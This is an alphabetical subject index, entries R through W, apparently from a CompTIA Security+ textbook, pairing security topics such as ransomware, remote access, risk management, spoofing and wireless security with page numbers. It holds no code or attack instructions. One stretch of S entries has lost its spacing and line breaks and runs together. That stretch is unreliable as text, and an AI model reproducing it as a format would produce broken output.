  use with encryption algorithms, 98
ransomware, 473
Rapid Spanning Tree Protocol (RSTP), 243
RAs (registration authorities)
  local, 132–133
  overview of, 131–132
  PKIX standard and, 168
  services provided by, 129
RAS (remote access server), 305
RATs (remote access trojans), 496, 653
RBAC (role-based access control), 303
RBL (Real-time Blackhole List), 515
RC (Rivest Cipher)
  IEEE 802.11 attacks on RC4, 353
  RC4 used for confidentiality in WEP, 350
  RC4 used for SSL/TLS encryption, 533
  RC5 supported by WTLS, 340
  versions of, 106–107
RDP (Remote Desktop Protocol), 322
real (associative or physical) evidence, 676
Real-time Blackhole List (RBL), 515
real time, HIDSs operating in, 388
reciprocal sites, alternative backup sites, 597
records, security training and, 58
recovery agent, 150
recovery point objectives (RPOs)
  disaster recovery, 591
  failure and recovery timing, 601
recovery/reconstitution procedures, incident response, 665–666
recovery time objectives (RTO), disaster recovery, 591
red flag rules, FTC, 726
redundancy
  RAID (Redundant Array of Independent Disks), 601–602
  of spare parts, 602–603
reference monitor, enforcing security policies, 410
registration authorities. See RAs (registration authorities)
registry
  forensic artifacts in, 687–688
  security templates and, 453
regulations, primary sources of. See also legal issues, 698–699
rehearsals, disaster recovery, 589–590
release control, 635
release management, 641
relevant evidence, standards of evidence, 677
remediation actions, after attacks, 684
remote access
  access control, 311
  authentication, 306–310
  authorization, 310–311
  connections, 330
  file transfer protocols, 322–323
  identification in, 305–306
  IEEE 802.1X, 311–312
  IPsec (IP Security), 324–329
  key issue for multiuser systems, 289
  methods, 312–314
  process of, 305
  review and Q&A, 331–335
  TACACS+ (Terminal Access Controller Access Control System+), 314–317
  vulnerabilities, 329–330
remote access server (RAS), 305
remote access trojans (RATs), 496, 653
Remote Authentication Dial-In User Service. See RADIUS (Remote Authentication Dial-In User Service)
Remote Desktop Protocol (RDP), 322
remote procedure call (RPC), 568
remote wiping, mobile device security, 363
removable media
  electronic media, 280–281
  encrypting, 439
  magnetic media, 278–279
  optical media, 279–280
  overview of, 277–278
removable storage
  mobile device security and, 366
  overview of, 256
renewal, digital certificates, 138–139
replay attacks, 484
reports
  in IDSs, 379
  incident response, 666
requirements phase, software development, 561–562
residual risk management, 618
response, in operational model of computer security, 20
retention, auditing, 499
retrieval method, XKMS, 177
reverse proxy, 271
reverse social engineering, 77
revocation, digital certificates, 139–142
RF (radio frequency)
  antenna placement and, 360
  site surveys testing for RF interference, 361
  unguided media, 277
RFC 1918, private address space, 237
Rifkin, Stanley Mark, 74–75
rights
  auditing user rights, 498
  reviewing as risk mitigation strategy, 615
  security templates controlling settings, 453
  Windows OSs, 289, 298–300
Rijndael, AES based on, 105
Ring policy, Biba security model, 36
ring topology, network topologies, 222
RIP (Routing Information Protocol), 442
RIPEMD (RACE Integrity Primitives Evaluation Message Digest), 101
risks/risk management
  acceptance, 625
  assessment, 586
  avoidance, transference, acceptance, mitigation, and deterrence, 628–629
  best practices, 627–629
  business risks, 613
  calculations, 622–625
  cost-effectiveness modeling, 626–627
  culture of, 612
  general risk management model, 616–618
  international banking example, 609–610
  mitigation strategies, 614–615
  models, 619
  NIST models, 618–619
  overview of, 608–609
  qualitative and quantitative assessment, 620–622, 625
  review and Q&A, 630–633
  SEI (Software Engineering Institute) model, 618
  technology risks, 613–614
  tools, 625–626
  vocabulary, 610–611
  what it is, 611–612
Rivest Cipher. See RC (Rivest Cipher)
Rivest, Ron, 106–107, 110–111
Rivest, Shamir, and Adleman (RSA) algorithm. See RSA (Rivest, Shamir, and Adleman) algorithm
rlogin command, Telnet, 321
road apple attacks, 193
rogue access points
  unauthorized access via, 82
  use for attacks on IEEE 802.11, 352–353
rogue device, detection of, 234
rogue modems, war-dialing and, 477
roles
  hardening Windows Server 2008, 414
  managing access by, 292
  role-based access control (RBAC), 303
  role-based training, 55–56
root account, special user accounts, 290
root CA, 172
rootkits, 470–471
rounds, DES, 104
routers/routing, 235
  infrastructure security, 258–259
  software updates, 442
Routing Information Protocol (RIP), 442
RPC (remote procedure call), 568
RPOs (recovery point objectives)
  disaster recovery, 591
  failure and recovery timing, 601
RSA (Rivest, Shamir, and Adleman) algorithm
  overview of, 110–111
  PGP using, 181
  PKCS #1 attack and, 341
  SSH and, 322
  SSL/TLS using, 533
RSA Security
  PKCS as subset of, 168
  PKCS (Public Key Cryptography Standards), 170–171
  S/MIME standard, 178, 518
RSTP (Rapid Spanning Tree Protocol), 243
RTO (recovery time objectives), disaster recovery, 591
rule-based
  access control, 303
  antivirus products, 428
run levels, hardening UNIX OSs, 418
Russia
  nation-state hacking, 7
  power grid attacks and, 4
SS/MIME(Secure/MultipurposeInternetMailExtensions)
CMStriple-encapsulatedmessages,180encryptinge-mail,518–520historyof,178–179overviewof,178specificationsinversion3,179
SaaS(SoftwareasaService)cloudcomputingand,284DRM(digitalrightsmanagement)and,122
SafeHarbor,dataprotection,728–729
SAFECode(SoftwareAssuranceForumforExcellenceinCode),560safeguards(controlsorcountermeasures)
defined,610designingandevaluating,617
Saltzer,Jerome,24SAML(SecurityAssertionMarkupLanguage),185sandboxing
digitalsandbox,396exampleofleastcommonmechanism,28virtualizationand,255
SANs(storageareanetworks)networkarchitectures,221overviewof,247storingdata,441
Sarbanes-OxleyAct(SOX),637,703SAs(securityassociations)
IPsec,325ISAKMP,175
SaudiAramco,6SB1386(CaliforniaSenateBill1386),724SCA(StoredCommunicationsAct),700SCADA(supervisorycontrolanddataacquisition),454scanningattacks,486,652Schneider,Bruce,107Schroeder,Michael,24SCM(SecurityComplianceManager),416screenlocks,mobiledevicesecurity,363–364scriptkiddies,9scriptinglanguages,JavaScript,544–545scripts,server-side,547SDcards,280
SDL(securedevelopmentlifecycle)modelsecurecodingconcepts,568softwaredevelopmentprocessmodels,559–560
secrecyprinciples,120secretinformation,classificationof,46Section404controls,Sarbanes-OxleyAct,703SecureBoot,hardeningWindowsServer2012,414–415securedevelopmentlifecycle(SDL)model
securecodingconcepts,568softwaredevelopmentprocessmodels,559–560
SecureFileTransferProtocol(SFTP),322–323,540–541SecureKeyExchangeMechanismforInternet(SKEMI),327Secure/MultipurposeInternetMailExtensions.SeeS/MIME(Secure/MultipurposeInternetMailExtensions)
securerecovery.Seealsodisasterrecovery,598–599SecureShell.SeeSSH(SecureShell)SecureSocketsLayer.SeeSSL(SecureSocketsLayer)securityapproaches
hostsecurity,23networksecurity,24overviewof,23
SecurityAssertionMarkupLanguage(SAML),185securityassociations(SAs)
IPsec,325ISAKMP,175
securityawarenessprogramsforemployees,84trainingfor,54–55
SecurityComplianceManager(SCM),416securityconcepts
accesscontrol,31–32
authentication,32Bell-LaPadulamodel,34–35Bibamodel,36Brewer-Nashmodel,35CIA(confidentiality,integrity,andavailability),20Clark-Wilsonmodel,36–37completemediation,27computersecurity,19confidentialitymodels,34configurationmanagement,23CybersecurityFrameworkModel,21–22defenseindepth,29–31diversityofdefense,31economyofmechanism,26–27exceptionmanagement,22–23fail-safedefaults,26GroupPolicy,32–33hostsecurity,23integritymodels,35leastcommonmechanism,28leastprivilege,24–25networksecurity,24opendesign,27–28operationalmodelofcomputersecurity,20overviewof,19passwordpolicy,33psychologicalacceptability,29reviewandQ&A,38–41securityapproaches,23ofsecuritymodels,33–34securityprinciples,24
securitytenets,22securityterminology,19separationofprivilege,25–26sessionmanagement,22
securitycontrolsABAC(attribute-basedaccesscontrol),303–304accountexpirationand,304ACLs(accesscontrollists),300–301inalternativeenvironments,459DAC(discretionaryaccesscontrol),302DLP(datalossprevention),304host-based,437–440MAC(mandatoryaccesscontrol),301permissions,297–298RBAC(role-basedaccesscontrol),303reviewandQ&A,331–335rule-basedaccesscontrol,303userrightsandprivileges,298–300
securitykernel,enforcingsecuritypolicies,410securitylayers,inhardening,458securitymodels
Bell-LaPadulamodel,34–35Bibamodel,36Brewer-Nashmodel,35Clark-Wilsonmodel,36–37confidentialitymodels,34integritymodels,35overviewof,33–34
securityperimeter.Seeperimetersecuritysecuritypolicies.Seepoliciessecurityprinciples(SaltzerandSchroeder)
completemediation,27defenseindepth,29–31diversityofdefense,31economyofmechanism,26–27fail-safedefaults,26leastcommonmechanism,28leastprivilege,24–25opendesign,27–28overviewof,24psychologicalacceptability,29separationofprivilege,25–26
securitytemplates,systemhardening,452–453securitytenets
configurationmanagement,23exceptionmanagement,22–23sessionmanagement,22
securityterminologyCIA(confidentiality,integrity,andavailability),20computersecurity,19CybersecurityFrameworkModel,21–22operationalmodelofcomputersecurity,20overviewof,19
securitythroughobscurity,28securityzones
conduitsand,246DMZ(demilitarizedzone),240–241enclaves,243–244extranet,242–243flatnetworks,243Internet,241–242intranet,242–243
overviewof,240VLANs(virtualLANs),244–245
SEI(SoftwareEngineeringInstitute)CMMImodels,644–645continuousriskmanagement,611–612riskmanagementmodel,618
self-certifying, root CA, 172
self-signed certificates, hierarchical trust model and, 157
Sender ID Framework (SIDF), blocking spam in e-mail, 516–517
sensors, in NIDSs, 384
separation of duties
  change management and, 637–638
  in Clark-Wilson security model, 37
  dual control, 150
  identifying, 642
  overview of, 25–26
separation of privilege, Saltzer and Schroeder’s eight principles of security design, 25–26
sequence numbers, spoofing attacks and, 481–482
server farms, fault tolerance from, 601
servers
  antivirus software for, 429
  client/server architectures, 222
  hardening, 411
  HTTP and HTTPS for data transfer, 537–539
  infrastructure security, 253
  server-side scripts, 547
  server-side vs. client-side validation, 579–580
service level agreements (SLAs)
  cloud computing and, 599
  interoperability agreements, 59
service packs, host hardening, 423–426
service set identifiers (SSIDs)
  features in IEEE 802.11, 349
  identifying rogue access points, 353
services
  security templates controlling settings, 453
  turning off unneeded, 411, 417, 443
session hijacking attacks. See also TCP/IP hijacking, 553
session keys, in symmetric encryption, 118
session management, 22
SET (Social-Engineering Toolkit), 496
SFTP (Secure File Transfer Protocol), 322–323, 540–541
SHA (Secure Hash Algorithm)
  ensuring data is not modified, 685
  used in SSL/TLS, 533
  versions of, 100–101
  WTLS support, 340
shadow files, hardening UNIX OSs, 418–419
Shamir, Adi, 110–111
Shamoon, 6
Shannon, Claude, 120
shared secret, symmetric encryption and, 103
shielded twisted pair (STP) cable, 274–275
shift ciphers, 94
shoulder surfing
  poor security practices, 80
  social engineering attacks, 76–77
side-jacking attacks, 553
SIDF (Sender ID Framework), blocking spam in e-mail, 516–517
Signaling System 7 (SS7), 224
signature-based scanning, antivirus products, 427
signature database
  in HIDSs, 389
  in IDSs, 379
  in NIDSs, 384
signatures
  digital. See digital signatures
  IDSs, 381–382
  in IPSs, 394
signed applets, 551–552
Simple Mail Transfer Protocol (SMTP), 417
Simple Network Management Protocol. See SNMP (Simple Network Management Protocol)
Simple Security Rule, in Bell-LaPadula security model, 34
simplicity, economy of mechanism, 26–27
single loss expectancy (SLE), in calculating risks, 611, 622–624
single point of failure
  high availability and, 600
  removing, 586
single sign-on (SSO), 294–295
site surveys, Wi-Fi, 361–362
SKEMI (Secure Key Exchange Mechanism for Internet), 327
slack space, system forensics and, 686
Slammer worm, 3, 575
SLAs (service level agreements)
  cloud computing and, 599
  interoperability agreements, 59
SLE (single loss expectancy), in calculating risks, 611, 622–624
smart cards, 280
smartphones, 339
SMTP (Simple Mail Transfer Protocol)
  controlling port 25 on mail servers, 514
  e-mail protocols, 505
  UNIX baselines and, 417
smurf attacks, 480–481
SNA (Systems Network Architecture), 224
snapshots, virtual machines, 254
sniffers/sniffing
  checking own connections, 539
  observing network traffic for unauthorized access, 282
  overview of, 479
  use for attacks on IEEE 802.11, 352
SNMP (Simple Network Management Protocol)
  changing community strings, 443
  interoperability and, 269
  managing routers, 259
  managing switches, 258
  software updates and, 442
Snort, NIDS tools, 387–388
social engineering
  hoaxes, 77–78
  obtaining insider information, 74–75
  overview of, 73–74
  phishing attacks, 57, 75–76
  reverse social engineering, 77
  shoulder surfing, 76–77
  spam, 76
  types of attacks, 478
  vishing attacks, 76
Social-Engineering Toolkit (SET), 496
social media/social networking
  alerts regarding new threats and security trends, 57
  human resources policies, 49
  worms and, 469
software. See also applications
  baselines of host software, 437, 448–449
  change control workflow, 641
  change management and, 636
  exploits, 492–493
  host-based firewalls, 435–436
  installing unauthorized, 81–82
  patches, 4, 13, 426
  updates, 425, 442, 473
  versions and change management, 636
  whitelisting and blacklisting, 434
Software as a Service (SaaS)
  cloud computing and, 284
  DRM (digital rights management) and, 122
Software Assurance Forum for Excellence in Code (SAFECode), 560
software development, 558
  application attacks, 572
  application configuration baseline, 579
  application hardening, 578–579
  application patch management, 579
  arbitrary/remote code execution, 578
  attachments as attack vector, 577
  buffer-overflow attacks, 575–576
  bug tracking, 571–572
  client-side attacks, 577
  coding phase, 562–566
  design phase, 562
  error/exception handling, 568
  fuzzing, 571
  injections, 573–575
  input/output validation, 568–571
  integer overflow attacks, 576
  LSOs (locally shared objects), 577
  NoSQL database vs. SQL database, 579
  OVAL (Open Vulnerability and Assessment Language), 578
  process models for, 559–560
  requirements phase, 561–562
  review and Q&A, 581–583
  secure coding concepts, 568
  securing development lifecycle, 560
  server-side vs. client-side validation, 579–580
  software engineering process, 559
  testing phase, 567–568
  threat modeling and attack surface area minimization, 560–561
  XSRF (cross-site request forgery), 576–577
  XSS (cross-site scripting) attacks, 572–573
  zero-day vulnerabilities, 577
Software Engineering Institute. See SEI (Software Engineering Institute)
software engineering process, 559
Software Restriction Policies (SRP), 434
solid state drives (SSDs)
  forensics and, 688
  overview of, 281
Sony hack, 6–7
SOX (Sarbanes-Oxley Act), 637, 703
spam
  antispam products, 430–431
  e-mail and, 514–516
  overview of, 484
  SIDF (Sender ID Framework) blocking, 516–517
  social engineering attacks, 76
Spam URI Real-time Block Lists (SURBL), in blocking spam, 516
SPAN (Switched Port Analyzer)
  IDSs supporting, 399
  overview of, 400
Spanning Tree Protocol (STP), 243, 258
spare parts, redundancy of, 602–603
spear phishing attacks, 75, 485
SPF (Sender Policy Framework) record, in blocking spam, 517
spim attacks, 76, 485
spiral model, software development, 559
spoliation, altering digital evidence, 676, 680
spoofing attacks
  DKIM (DomainKeys Identified Mail) detecting e-mail spoofing, 517
  e-mail spoofing, 480
  IP address spoofing, 480–481
  overview of, 480
  sequence numbers and, 481–482
  trusted relationships and, 481
SPR (system problem report), 643
spyware
  antispyware products, 431–432
  overview of, 471
SQL database, 579
SQL injection attacks, 573–574
SQL Slammer, 572
SRP (Software Restriction Policies), 434
SS7 (Signaling System 7), 224
SSDs (solid state drives)
  forensics and, 688
  overview of, 281
SSH (Secure Shell)
  DH protocol used by, 110
  securing network functions, 321–322
  SFTP using, 540
SSIDs (service set identifiers)
  features in IEEE 802.11, 349
  identifying rogue access points, 353
SSL (Secure Sockets Layer)
  DH protocol used by, 110
  disabling, 174
  how SSL/TLS works, 532–536
  HTTPS using, 182
  interacting with PKI and certificates, 173
  overview of, 531–532
  POODLE (Padding Oracle On Downgraded Legacy Encryption) attacks, 532
SSL stripping attacks, 538
SSL/TLS functions for LDAP services, 539–540
SSO (single sign-on), 294–295
standards. See also by individual types
  compliance with security-related, 56
  defined, 43
  developing, 43–44
star property (*-property), enforced by Bell-LaPadula, 34–35
star topology, network topologies, 222
STARTTLS method, e-mail protocols and, 505
state of compromise, incident response, 667
stateful packet filtering, 261–262
static NAT, 239
statutory laws, 698
steganography, 114–115
STIX (Structured Threat Information eXpression), 669–670
storage
  auditing, 498
  backups, 596
  managing data storage across network, 255–256
  removable, 256
storage area networks (SANs)
  network architectures, 221
  overview of, 247
  storing data, 441
storage segmentation
  BYOD concerns, 367
  mobile device security and, 364–365
Stored Communications Act (SCA), 700
STP (shielded twisted pair) cable, 274–275
STP (Spanning Tree Protocol), 243, 258
stream ciphers
  RC4 stream cipher, 107, 350, 353
  vs. block ciphers, 104, 108
streams, forensic tools analyzing on Windows systems, 687
string handling, buffer-overflow and, 569
Structured Threat Information eXpression (STIX), 669–670
structured threats, criminal organizations in, 10
Stuxnet attack, 5–6, 454
subnet masks, 236
subnetting, 236–238
substitution ciphers, 92, 94–96
succession planning, business continuity and, 586–587
sufficient evidence, standards of evidence, 677
superuser, special user accounts, 290
supervisory control and data acquisition (SCADA), 454
SURBL (Spam URI Real-time Block Lists), in blocking spam, 516
Suricata, NIDS tools, 387–388
surveillance
  CCTV (closed circuit TV) for, 198–199
  physical access controls, 62
suspension, digital certificates, 139
Switched Port Analyzer (SPAN)
  IDSs supporting, 399
  overview of, 400
switches
  loop protection, 258
  overview of, 257–258
symmetric encryption
  AES (Advanced Encryption Standard), 105
  asymmetric encryption compared with, 113
  block ciphers vs. stream ciphers, 108
  Blowfish, 107
  CAST (Carlisle Adams and Stafford Tavares), 105–106
  DES (Data Encryption Standard), 103–105
  how PGP works, 180
  IDEA (International Data Encryption Algorithm), 107–108
  overview of, 103
  in PGP suite, 122–123
  RC (Rivest Cipher), 106–107
  session keys in, 119
  in SSL/TLS, 533
  summary, 108
  tokens and, 296
  Twofish, 107
SYN flood attacks, 475, 477
SYN packets, in TCP three-way handshake, 228–229
system hardening
  in alternative environments, 454–457
  applications (programs). See applications, hardening
  baselines and, 409
  group policy and, 450–452
  host-based. See host hardening
  identifying critical systems for business continuity planning, 586
  methods, 457–459
  network-based. See network hardening
  operating systems and, 409–410
  overview of, 408
  preparing for incident response, 656
  preventative steps administrators can take, 13
  review and Q&A, 460–463
  security templates and, 452–453
  vulnerabilities, 627
system problem report (SPR), 643
systematic risks, 611
Systems Network Architecture (SNA), 224
T
tablet computer, theft of, 201
tabletop exercises, preparing for disaster recovery, 590
TACACS+ (Terminal Access Controller Access Control System+)
  remote access methods, 314–317
  remote access vulnerabilities, 329–330
tailgating (piggybacking), poor security practices, 80
tangible impacts, impact determination and quantification, 617
tape, types of magnetic media, 278–279
targets, specific and opportunistic, 12
Tavares, Stafford, 105–106
TAXII (Trusted Automated eXchange of Indicator Information), 669–670
TCO (total cost of ownership), 626
TCP/IP hijacking
  overview of, 482
  sequence numbers and, 482
TCP/IP (Transmission Control Protocol/Internet Protocol)
  importance of, 227
  overview of, 224
  traces with Wireshark, 403
TCP (Transmission Control Protocol)
  ISAKMP implementation on transport layer, 175
  packet flags, 229
  port scanners, 444
  reset message, 387
  three-way handshake, 228–229
  vs. UDP, 227–229
TCP wrappers
  host-based firewalls in Linux OSs, 435–436
  overview of, 459
  protecting UNIX OSs, 419
teams, incident response, 651–652, 656–658
technology risks, 613–614
telecommunications
  hacks on phone system, 266
  mobile phones. See mobile devices
telephony, 266
Telnet
  banner grabbing, 404
  managing routers, 259
  managing switches, 258
  remote access via, 321
  software updates and, 442
TEMPEST program, DoD (Department of Defense), 66–67, 209
templates, security templates, 452–453
Temporal Key Integrity Protocol (TKIP), 354–355
Terminal Access Controller Access Control System+ (TACACS+)
  remote access methods, 314–317
  remote access vulnerabilities, 329–330
terrorists, types of threats, 10–11
tests
  change management, 635
  disaster recovery, 589–590
  software development, 567–568
theft
  device theft, 203–204
  DLP (data loss prevention), 304
  of laptops and tablets, 201
  mitigation strategies, 615
third-party trust model, 130
threats
  actors, 610
  advanced persistent threats. See APTs (advanced persistent threats)
  alerts, 57–58
  assessing in risk management model, 616–617
  certificate-based, 160–161
  CompTIA Security+ Exam Objectives, 745–749
  criminal organizations, 10
  current, 4–7
  defined, 610
  insiders, 9–10
  intruders, 9
  modeling, 560–561
  nation-states, terrorists, and information warfare, 10–11
  probability/likelihood, 628
  sources or types of, 7
  vectors, 610, 627–628
  viruses and worms, 8
three-way handshake, TCP, 228–229
Time-based One-Time Password (TOTP), 292
time bomb, 471
timestamp authority (TSA), nonrepudiation services, 136
TKIP (Temporal Key Integrity Protocol), 354–355
TLS Cipher Suite Registry, 174
TLS Handshake Protocol, 173–174
TLS Record Protocol, 173
TLS (Transport Layer Security)
  DH protocol used by, 110
  in EAP-TLS, 357
  handshake, 533
  how SSL/TLS works, 532–536
  HTTPS using, 182
  interacting with PKI and certificates, 173–174
  overview of, 531–532
  SSL/TLS functions for LDAP services, 539–540
  STARTTLS method, 505
  using in place of SSL, 533
  vulnerabilities, 541
  WTLS based on, 340
TMS (Transport Management System), 640
Token Ring, 224
tokens
  for access. See access tokens
  as authentication factor, 296–297
  in challenge/response process, 310
tools
  computer forensics, 682
  NIDSs (network-based IDSs), 387–388
  risk management, 625–626
  steganography, 115
  used in attacks, 496–497
tools, IDSs
  active vs. passive, 402–403
  banner grabbers, 403–404
  port scanners, 400–402
  protocol analyzers, 398–399
  SPAN (Switched Port Analyzer), 400
top secret information, classification of, 46
topologies, network, 222–223
total cost of ownership (TCO), 626
Total Tester software for exam practice, 756–757
TOTP (Time-based One-Time Password), 292
TPM (Trusted Platform Module)
  creating and storing encryption keys, 194
  hardware encryption devices, 438
  in key management, 98
traffic collector
  in HIDSs, 389
  in IDSs, 378
  in NIDSs, 383
training
  metrics and compliance, 58
  programs for, 85
  role-based, 55–56
  security awareness, 54–55
  security policies and procedures, 55
transitive access, attacks violating trust relationship between machines, 484
transitive trusts, mobile application security, 372
transport encryption, 120
Transport Layer Security. See TLS (Transport Layer Security)
Transport Management System (TMS), 640
transport mode, IPsec, 182–183
transposition cipher, 92–94
trapdoors
  in asymmetric encryption, 109
  overview of, 472–473
trapping, antispam products, 431
trends (security-related)
  alerts and, 57–58
  overview of, 11–12
Trillian IM client, 523
Triple DES (3DES). See 3DES (Triple DES)
Tripwire
  hash values used in detecting intrusion, 411
  passive tools, 402
Trojan horses, 470
trust
  certificate verification and, 143–146
  hierarchical trust model, 155–157
  hybrid trust model, 159–160
  mobile application security and, 372
  peer-to-peer trust model, 158–159
trust anchors, 155–156
trust domains, 154–155
TRUSTe, on PII, 718
Trusted Automated eXchange of Indicator Information (TAXII), 669–670
Trusted OSs, 434–435
Trusted Platform Module. See TPM (Trusted Platform Module)
trusted relationships, spoofing attacks, 481
TSA (timestamp authority), nonrepudiation services, 136
tunneling
  authentication protocols, 317–318
  IPsec tunnel mode, 182–183
  L2TP (Layer 2 Tunneling Protocol), 320–321
  overview of, 246–247
  PPP (Point-to-Point Protocol), 317–318
tunneling proxies, 270
twisted pair cable, UTP/STP, 274–275
Twitter, sharing too much information, 57
Twofish, 107
typosquatting, client-side attacks, 494
U
UDIs (unconstrained data items), in Clark-Wilson security model, 37
UDP (User Datagram Protocol)
  ISAKMP implementation on transport layer, 175
  port scanners, 444
  vs. TCP, 227–229
UEFI (Unified Extensible Firmware Interface)
  hardening Windows Server 2012, 414
  physical security and, 200–201
UMTS (Universal Mobile Telecommunications System), 342
unconstrained data items (UDIs), in Clark-Wilson security model, 37
unerase tools, for computer forensics, 682
unguided media
  IR (infrared), 276
  overview of, 276
  RF (radio frequency), 277
Unicode, 569–570
Unified Extensible Firmware Interface (UEFI)
  hardening Windows Server 2012, 414
  physical security and, 200–201
unified threat management (UTM), 272–273
Uniform Resource Locator (URL), 530
uninterruptible power supply. See UPS (uninterruptible power supply)
Universal Mobile Telecommunications System (UMTS), 342
Universal Serial Bus (USB)
  devices. See USB devices
  encryption, 438
  tokens, 296
UNIX OSs
  baselines, 417
  DAC (discretionary access control), 302
  file permissions, 302
  hardening UNIX, 418–419
  Mac OS X based on, 421–422
unshielded twisted pair (UTP) cable, 274–275
unsolicited commercial e-mail. See also spam, 514
unstructured threats, 9
unsystematic risks, 611
unused features, disabling for mobile device security, 366
updates
  antivirus products, 428
  applications, 426
  malware defenses, 473
  manual, 458
  software, 426, 442
upgrades, compared with patches, 445
UPS (uninterruptible power supply)
  in physical security, 64
  protecting against short-term power failure, 208
  utility and power interruptions and, 598
URL filters, blocking prohibited websites, 273
URL hijacking, client-side attacks, 494
URL (Uniform Resource Locator), 530
USA Patriot Act, 702
USB devices
  boot disk attacks using flash drives, 192–194
  physical security and, 201
  possible sources of forensic information on, 687
  types of electronic media, 280–281
USB tokens, 296
USB (Universal Serial Bus), encryption, 438
use cases, in testing phase of software development, 567
user acceptance, BYOD concerns, 369
User Account Control, hardening Windows OSs, 413
User Datagram Protocol. See UDP (User Datagram Protocol)
user IDs
  identification in, 305–306
  session management and, 22
  SSO (single sign-on), 294–295
  vs. usernames, 289
user interface, in IDSs, 379
user rights. See rights
usernames, 289
users/user accounts
  auditing access, 498
  auditing accounts, 290
  authentication, 289–291
  controlling with AppLocker, 434
  identification in, 305–306
  privacy, 732–733
  privilege management, 288–289
  reviewing rights and permissions as risk mitigation strategy, 615
  security templates, 453
  special accounts, 290
  user habits, 56–57
UTF-8, 570
UTM (unified threat management), 272–273
UTP (unshielded twisted pair) cable, 274–275
V
vacations, human resources policies, 49–50
validate service, XKMS, 177
validation
  input/output validation, 568–571
  server-side vs. client-side validation, 579–580
van Eck phenomenon, 66, 209
vehicles, hardening in-vehicle computing systems, 457
ventilation. See HVAC (heating, ventilation, and air conditioning)
Verizon, Data Breach Investigations Report, 12
version control, 635
Video Privacy Protection Act (VPPA), 722–723
video surveillance, physical access controls, 62
Vigenère cipher, 95–96
virtual LANs. See VLANs (virtual LANs)
virtual machines (VMs), 254–255
virtual private networks. See VPNs (virtual private networks)
virtualization
  benefits of, 254–255
  risks associated with, 629
viruses
  alerts regarding new threats and security trends, 57
  armored viruses, 468
  avoiding infection, 468
  BYOD concerns, 367
  e-mail malware, 510–513
  historical security incidents, 2–3
  overview of, 466–467
  speed of proliferation, 3
  types of, 8, 467–468
vishing attacks
  overview of, 485
  social engineering attacks, 76
VLANs (virtual LANs)
  managing, 443
  network architectures, 222
  overview of, 244–245
  security implications of, 245
  trunking, 245
VMs (virtual machines), 254–255
VoIP (Voice over IP)
  4G mobile networks, 343
  PBX and, 266
  security perimeter and, 60–61
  vishing attacks, 76
VPNs (virtual private networks)
  Group Policy providing VPN compatibility, 451
  overview of, 323–324
  PPTP and, 318–319
  tunneling, 246–247
  VPN concentrator, 266–267
VPPA (Video Privacy Protection Act), 722–723
vulnerabilities
  application, 474
  application-level attacks, 572
  assessment, 43
  bug tracking, 571–572
  CompTIA Security+ Exam Objectives, 745–749
  defined, 610
  eliminating, 465
  minimizing avenues of attack, 465–466
  null sessions (Windows OSs), 478
  patches and, 4
  reducing in code, 563
  remote access, 329–330
  researching, 656
  system, 627
  turning off unneeded services, 411, 417
  WAP, 341
  web application, 552–553
  web component, 541
  zero-day, 577
vulnerability scanners, 413, 448–450
W
W3C (World Wide Web Consortium), 176–178
walls, in physical security, 195
WANs (wide area networks), 221
WAP gap, 341
WAP (Wireless Application Protocol)
  demand for data services and, 339
  mobile data applications, 337
  vulnerability in WAP aggregation, 341
  WTLS and, 340
WAPs (wireless access points), 60, 264–265
war-chalking attacks, 351
war-dialing attacks
  IEEE 802.11 attacks and, 351
  overview of, 477
war-driving attacks
  dealing with unauthorized access, 283
  IEEE 802.11 attacks and, 351
  overview of, 477–478
war-flying attacks, 351
war-walking attacks, 351
warm sites, alternative backup sites, 597
WASC (Web Application Security Consortium), 553
Wassenaar Arrangement, 705–706
water-based fire suppression systems, 205
waterfall model, software development, 559
watering hole attacks, client-side attacks, 495
weak keys
  attacks on encryption, 486–487
  in DES, 104
  key stretching, 119
Web 2.0 security, 554
web application firewalls, 264
Web Application Security Consortium (WASC), 553
web browsers. See browsers
web components
  ActiveX, 545–546
  application vulnerabilities and, 552–553
  browser plug-ins, 550–551
  buffer-overflow attacks, 542
  CGI (Common Gateway Interface), 546
  client-side attacks, 554
  code-based vulnerabilities, 541–542
  concerns, 531
  cookies, 547–550
  DAP and LDAP for directory services, 539–540
  FTP and SFTP for file transfer, 540–541
  HTTP and HTTPS for data transfer, 537–539
  Java, 542–543
  JavaScript, 544–545
  malicious add-ons, 551
  overview of, 530–531
  review and Q&A, 555–557
  securing browsers, 546
  server-side scripts, 547
  session hijacking attacks, 553
  signed applets, 551–552
  SSL and TLS protocols for encryption, 531–536
  vulnerabilities, 541
  Web 2.0 security, 554
web privacy
  cookies and, 732
  overview of, 731–732
web protocols
  DAP and LDAP for directory services, 539–540
  FTP and SFTP for file transfer, 540–541
  HTTP and HTTPS for data transfer, 537–539
  SSL and TLS for encryption, 531–536
web proxies, 271
web security gateways, 271
websites
  blocking prohibited sites, 273
  phishing attacks via, 75
Website defacement incident, 3
weight-based system, antivirus products, 428
WEP (Wired Equivalent Privacy)
  confidentiality, 350
  dynamic key generation, 357–358
  IEEE 802.11 attacks and, 353–354
  tools for cracking WEP keys, 352
WEPCrack, 352
whaling attacks, 75
white-box testing, in software development, 567
white-hat hacking, 497
whitelisting applications, 434
Wi-Fi Protected Access. See WPA (Wi-Fi Protected Access)
Wi-Fi Protected Setup (WPS), 355
wide area networks (WANs), 221
WiMAX band, 337
Windows Defender
  host hardening, 431–432
  OS hardening, 413
Windows Firewall, 413, 436
Windows Mail, 519–520
Windows OSs
  DAC (discretionary access control), 302
  disabling autoplay, 202
  finding MAC addresses, 233–234
  Group Policy, 32–33, 450–452
  groups, 291
  host forensics, 687–688
  host hardening, 413–417
  NAP (Network Access Protection), 267–268
  patches, 426
  privileges or user rights, 298–300
  security controls and permissions, 297–298
  security templates, 453
Windows Server 2008, hardening, 413–414
Windows Server 2012, hardening, 414–415
Windows Server Update Services (WSUS), 447–448
Windows Update utility, 424–426
Windows Vista/7
  Automatic Updates, 424–426
  file system encryption, 123
  hardening, 413
wire speed, cable, 395
Wired Equivalent Privacy. See WEP (Wired Equivalent Privacy)
wireless access points (WAPs), 60, 264–265
Wireless Application Protocol. See WAP (Wireless Application Protocol)
wireless LANs (WLANs), 337
wireless networks
  captive portals handling authentication on, 362
  introduction to, 337–338
  mesh architecture, 223
  security issues, 65–66
  wireless protocols, 312
wireless security
  3G mobile networks, 342
  4G mobile networks, 343
  attackers connecting to network via wireless bridges, 192
  Bluetooth and, 343–345
  Bluetooth attacks, 345–346
  IEEE 802.11 and, 347–350
  IEEE 802.11 attacks, 350–354
  introduction to wireless networks, 337–338
  methods, 354–355, 357–359
  mobile phones, 338–340
  NFC (near field communication), 347
  review and Q&A, 373–375
